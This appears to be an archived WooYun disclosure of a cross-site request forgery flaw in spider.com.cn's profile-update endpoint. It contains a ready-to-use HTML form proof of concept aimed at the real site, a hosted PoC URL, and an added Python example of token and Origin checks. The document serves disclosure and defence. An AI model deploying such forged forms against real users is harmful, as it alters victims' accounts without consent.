WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-08-20: Details have been reported to the vendor and are awaiting processing. 2015-08-25: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
CSRF
The profile-modification endpoint performs no token validation and does not verify the Referer header.
<html>
<body>
  <form action="http://www.spider.com.cn/newuserjquery.action" method="POST">
    <input type="hidden" name="usertype" value="first002" />
    <input type="hidden" name="useralise" value="wooyuntest" />
    <input type="hidden" name="sex" value="m" />
    <input type="hidden" name="year_sld" value="2015" />
    <input type="hidden" name="month_sld" value="01" />
    <input type="hidden" name="day_sld" value="01" />
    <input type="hidden" name="uxzvalue" value="Capricorn" />
    <input type="hidden" name="xue_sld" value="" />
    <input type="hidden" name="zhi_sld" value="" />
    <input type="hidden" name="shou_sld" value="" />
    <input type="hidden" name="_Province" value="" />
    <input type="hidden" name="_City" value="null" />
    <input type="hidden" name="_Region" value="null" />
    <input type="hidden" name="interestall" value="" />
    <input type="hidden" name="signature" value="tomatotest" />
    <input type="hidden" name="filminterest" value="" />
    <input type="hidden" name="uheight" value="" />
    <input type="hidden" name="uweight" value="" />
    <input type="hidden" name="mybody" value="" />
    <input type="hidden" name="mycar" value="" />
    <input type="hidden" name="fang_sld" value="a" />
    <input type="submit" value="Submit request" />
  </form>
</body>
</html>
Visit the PoC page while logged in:
PoC URL: http://xss.gift/spidercsrf.html
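As an added example, not part of the WooYun report or of the site's own code: the two server-side checks the report says are missing, a per-session token compared in constant time and an Origin/Referer check against the site's own origin, applied to a request shaped like the PoC form. SITE_ORIGIN, the header/form dictionaries and the session store are assumed stand-ins for a real framework's request objects.

```python
# Added example (not from the WooYun report): CSRF checks for the profile-update
# endpoint. Requests are modelled as plain dicts so the block runs offline.
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://www.spider.com.cn"   # assumed origin of the vulnerable site


def origin_allowed(headers: dict) -> bool:
    """Accept a state-changing request only if Origin (or Referer) is our own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False          # fail closed: no source header, no profile update
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def token_valid(form: dict, session: dict) -> bool:
    """Compare the submitted token with the per-session token in constant time."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def allow_profile_update(headers: dict, form: dict, session: dict) -> bool:
    """Both checks must pass: a same-origin source and a matching session token."""
    return origin_allowed(headers) and token_valid(form, session)


if __name__ == "__main__":
    session = {"csrf_token": secrets.token_hex(16)}
    # Constructed request mirroring the PoC form: posted from a third-party page, no token.
    forged = {"usertype": "first002", "useralise": "wooyuntest", "signature": "tomatotest"}
    print(allow_profile_update({"Referer": "http://xss.gift/spidercsrf.html"}, forged, session))  # False
    # Same form submitted from the site's own page with the session token included.
    legit = dict(forged, csrf_token=session["csrf_token"])
    print(allow_profile_update({"Origin": SITE_ORIGIN}, legit, session))  # True
```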
Severity: no impact (vendor ignored)
Ignored at: 2015-08-25 15:42
Vulnerability Rank: 4 (WooYun rating)
Vendor response: none yet